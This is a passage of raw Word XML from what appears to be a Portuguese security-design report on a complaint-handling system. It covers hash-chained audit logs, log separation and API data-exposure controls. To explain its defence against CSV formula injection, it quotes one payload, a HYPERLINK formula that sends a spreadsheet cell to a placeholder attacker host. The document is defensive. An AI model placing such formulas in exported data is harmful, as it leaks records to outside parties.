          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">hashAnterior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hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O IP respeita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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">quando presente,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">sem confiar cegamente nele</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: o cabeçalho é fornecido pelo cliente e pode ser forjado, então é registrado como informação, não como prova.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText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detalhe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tem uma regra que está escrita como comentário na própria coluna do banco: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Descrição curta e não sensível. O relato da denúncia jamais entra aqui.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A regra não é preciosismo: a OWASP lista explicitamente senhas, identificadores de sessão, tokens de acesso e chaves entre os dados que nunca devem ser registrados (OWASP, [s.d.]b), e o mesmo raciocínio vale para o relato de uma vítima. Uma trilha que copiasse o relato para</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dar contexto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">viraria uma segunda cópia do dado sensível, com acesso mais amplo que o original, já que auditores a leem e gestores não.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cada registro guarda o hash SHA-256 do anterior, formando um encadeamento. O primeiro aponta para o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">gênese</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, 64 zeros.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anterior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repo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findFirstByOrderByIdDesc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AuditoriaLog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getHash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orElse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GENESE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setHashAnterior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anterior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setHash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sha256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conteudoParaHash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">()));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O encadeamento responde a uma exigência conhecida: o NIST adverte que os logs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">need to be protected from breaches of their confidentiality and integrity</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e que podem sofrer alteração ou destruição, intencional ou não (NIST, 2006), e a OWASP recomenda construir detecção de adulteração para que se saiba se um registro foi modificado (OWASP, [s.d.]b).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O conteúdo canônico que entra no hash junta todos os campos do registro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">e o hash anterior</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. A consequência: alterar qualquer campo de qualquer linha muda o hash daquela linha, que deixa de bater com o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">hashAnterior</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">da seguinte, e a quebra é detectável.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A verificação percorre a cadeia e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">distingue dois tipos de adulteração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Sintoma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hash recalculado não bate com o gravado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O conteúdo do registro foi alterado após a gravação</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:iCs/>
                <w:i/>
              </w:rP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hashAnterior</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">não corresponde ao antecessor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“</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:iCs/>
                <w:i/>
              </w:rPr>
              <w:t xml:space="preserve">Registro removido ou inserido na cadeia</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:iCs/>
                <w:i/>
              </w:rPr>
              <w:t xml:space="preserve">”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Isso importa numa investigação: apagar uma linha e alterar uma linha são condutas diferentes, e a trilha diz qual das duas aconteceu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">O que essa cadeia não faz.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ela não impede adulteração. Quem tem acesso de escrita ao banco pode reescrever tudo, inclusive recalcular os hashes. O que ela garante é que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">adulteração parcial não passa despercebida</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Para tornar a fraude impossível seria preciso replicar os hashes fora do alcance de quem administra o banco, o que está fora do escopo desta fase mas é a evolução natural, registrada na seção 5.8.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sete testes automatizados provam a detecção, alterando e removendo registros de propósito e exigindo que o sistema aponte onde a cadeia quebrou.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="123"/>
    <w:bookmarkStart w:id="124" w:name="um-defeito-que-virou-teste"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.4.6 Um defeito que virou teste</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Na primeira execução real, a verificação de integridade falhou num sistema recém-inicializado. A causa:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">LocalDateTime.now()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tem precisão de nanossegundos, e a coluna</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">TIMESTAMP(6)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">do banco truncava ao gravar. O hash era calculado antes de salvar, com nanossegundos, e recalculado depois de ler, sem eles. Nunca batia.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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setDataHora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truncatedTo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ChronoUnit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MILLIS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Existe um teste dedicado a fixar esse truncamento, para que ninguém o remova sem perceber. E vale registrar a lição:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">um mecanismo de integridade que dá alarme falso é pior que nenhum</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, porque treina quem opera a ignorá-lo.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98f370f59ea26e9e9beadd83d85345447a744cd"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.5 Requisito (d): log técnico e registro de auditoria não são a mesma coisa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Os dois gravam eventos e param de se parecer aí. A distinção não é deste projeto: o guia do NIST sobre gestão de logs já separa, dentro dos registros de um sistema operacional, os eventos de sistema dos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">audit records</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, que documentam tentativas de autenticação, acessos a arquivos e mudanças de política de segurança (NIST, 2006).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14"/>
        <w:gridCol w:w="2904"/>
        <w:gridCol w:w="31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 técnico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Registro de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Para que serve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diagnosticar defeito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quem fez o quê, quando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Pergunta que responde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por que quebrou?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quem acessou o relato do caso 4471?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Quem lê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quem desenvolve e sustenta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corregedoria, controladoria, autoridade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Onde vive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de log do servidor, saída padrão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</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">AUDITORIA_LOG</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, no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texto livre, com nível e</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:iCs/>
                <w:i/>
              </w:rPr>
              <w:t xml:space="preserve">stack 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estruturado, com campos fixos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Retenção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dias ou semanas; rotaciona e é descartado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anos; é a memória institucional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Pode ser apagado?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é rotina de operação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sem quebrar a cadeia de hashes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Contém dado pessoal?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não deve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e por isso é restrito a AUDITOR e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Vale como prova?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não, é editável e volátil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sim, é essa a razão de existir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Quem provoca o evento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programa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pessoa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Efeito de perder o registro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dificulta corrigir um defeito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inviabiliza responsabilizar alguém</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">No Protege+ os dois convivem, e a fronteira entre eles fica visível no tratamento do erro 500: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rastreio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randomUUID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"[{}] Erro nao tratado"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rastreio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LOG TECNICO: stack trace completo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INTERNAL_SERVER_ERROR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"Erro interno. Informe o codigo de rastreio ao suporte."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rastreio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iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">stack trace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, com nomes de tabela, colunas e caminhos de arquivo, vai para o log técnico, onde quem sustenta o sistema o encontra. O cliente recebe oito caracteres.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Nada disso entra na trilha de auditoria</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, porque uma falha técnica não é uma ação humana sobre dado pessoal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O inverso também vale: quando um AUDITOR abre a trilha, isso vira registro de auditoria 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vira linha de log técnico. São dois livros, com propósitos, leitores e prazos diferentes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Um cuidado decorre disso:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">log técnico não deve conter dado pessoal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. A orientação da OWASP é categórica ao afirmar que informação privada ou secreta jamais deve ser registrada em log (OWASP, [s.d.]g). Registrar o relato de uma denúncia numa mensagem de depuração colocaria conteúdo sensível num arquivo rotacionado, lido por quem desenvolve e frequentemente enviado a serviços externos de observabilidade, fora de todo o controle de acesso construído nas seções anteriores. Vale lembrar que o dever de comunicar incidentes existe e tem prazo: a ANPD fixou em três dias úteis a comunicação de incidente de segurança que possa acarretar risco ou dano relevante (ANPD, 2024), e entre julho de 2023 e junho de 2025 recebeu 723 comunicações (ANPD, 2025).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="126"/>
    <w:bookmarkStart w:id="127" w:name="X18ab1cb4c45f66a0879447f88c55d8baa647232"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.6 Requisito (e): medidas para reduzir a exposição de dados na API</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Oito medidas, da mais estrutural à mais operacional. Cada uma responde a um risco catalogado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">1. Não enviar o que não é necessário.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">É a medida mais eficaz, porque é a única que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">elimina</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o risco em vez de administrá-lo. Três DTOs de saída para a mesma entidade: a listagem carrega 11 campos e nenhum relato; o detalhe carrega 20 e é auditado. É a resposta direta ao risco</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">API3:2023</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, categoria que a OWASP formou justamente reunindo a antiga</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Excessive Data Exposure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Mass Assignment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(OWASP, 2023), e a aplicação do princípio da necessidade da LGPD (BRASIL, 2018a, art. 6.º, III).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Se a listagem trouxesse o relato, abrir o Kanban leria cem denúncias de uma vez, e a auditoria de consulta sensível viraria teatro.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">2. Mascarar no servidor.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joao.silva@x.com  vira  j***a@x.com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telefone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(11) 98765-4321   vira  *******4321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endereco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                  vira  [endereco protegido]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O valor mascarado é o que o servidor serializa. Não há campo oculto no JSON esperando um</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">F12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3. Errar respostas de forma silenciosa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O 403 não revela se o recurso existe. Responder 403 para casos existentes e 404 para inexistentes daria a qualquer pessoa autenticada um</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">oráculo de existência</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: sem ler nada, ela mapearia a base por tentativa e erro. É a forma discreta do risco</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">API1:2023</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(OWASP, 2023).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">4. Não devolver mensagem de exceção.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nome de tabela, de coluna e trecho de SQL num corpo de erro são material de reconhecimento. Ficam no log; o cliente recebe o código de rastreio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">5. Restringir a origem que pode chamar a API.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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setAllowedOrigins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lista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e nao allowedOriginPatterns("*")</w:t>
      </w:r>
      <w:r>
        <w:br/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setAllowCredentials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O curinga combinado com credenciais permitia que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">qualquer site da internet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">disparasse requisições autenticadas a partir do navegador de um servidor logado. A própria OWASP registra que o navegador rejeita resposta com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Access-Control-Allow-Origin=*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">quando credenciais são permitidas, e recomenda que o servidor libere apenas origens que a equipe controla definitivamente (OWASP, [s.d.]d). Por isso as origens agora são declaradas explicitamente, e os cabeçalhos expostos também são declarados um a um (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Location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Content-Disposition</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), e não liberados em bloco.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">6. Limitar o volume por origem.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Um endpoint público sem limite é um endpoint que qualquer um esvazia, e a OWASP trata a ausência desse limite como o risco</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">API4:2023 Unrestricted Resource Consumption</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(OWASP, 2023).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /api/denuncias</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">aceita 5 por minuto por IP;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, 20. Ambos devolvem</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">429</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, que é o código que o RFC 6585 define para</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the user has sent too many requests in a given amount of time</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(IETF, 2012).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Os números são diferentes de propósito. Denúncia é mais restrita porque o custo de uma inundação de registros falsos recai sobre a equipe de atendimento. O login é mais folgado porque a chave é o IP, e vários servidores atrás do mesmo NAT corporativo compartilham um endereço: um limite apertado barraria uma repartição inteira por causa de uma pessoa que errou a senha. Força bruta continua contida, porque 20 por minuto são 28.800 tentativas diárias contra hashes BCrypt, e o bcrypt é deliberadamente lento justamente para tornar o ataque por tentativa custoso (PROVOS; MAZIÈRES, 1999; OWASP, [s.d.]a).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O filtro roda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da autenticação, porque força bruta de senha precisa ser barrada antes de chegar à verificação dela.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">7. Tratar exportação como a operação mais perigosa do sistema.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Uma consulta sensível expõe um caso. Uma exportação entrega centenas de uma vez, num arquivo que passa a circular por e-mail e por pen drive,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">fora de todo o controle de acesso construído até aqui</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Por isso ela é sempre auditada, respeita o mesmo mascaramento das telas (negar o endereço no detalhe e entregá-lo em lote numa planilha seria uma contradição que o atacante encontraria antes do avaliador) e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">não leva o relato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. As perguntas de gestão, como volume, tipo, prazo e situação, não precisam do texto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Há ainda um ataque que não acontece na API:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">injeção de fórmula em CSV</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. A OWASP descreve o problema como a incorporação de entrada não confiável em arquivos exportados, e lista como caracteres a neutralizar o sinal de igual, o mais, o menos e a arroba (OWASP, [s.d.]f). Um denunciante que escrevesse o endereço como</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">=HYPERLINK("http://sitedele/?d="&amp;A1;"clique")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">faria a planilha do órgão público exfiltrar a linha ao ser clicada, dias depois, na máquina de quem abriu o arquivo, longe de qualquer log da aplicação. A defesa é prefixar o valor com apóstrofo, o que força a planilha a tratá-lo como texto: o usuário vê o conteúdo original, e a planilha não o executa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">8. Não vazar dado para terceiros.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O contexto que o VigIA envia ao Google Gemini na pergunta livre do gestor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">não contém relatos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. E toda análise declara sua origem,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GEMINI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REGRAS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, persistida na coluna</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
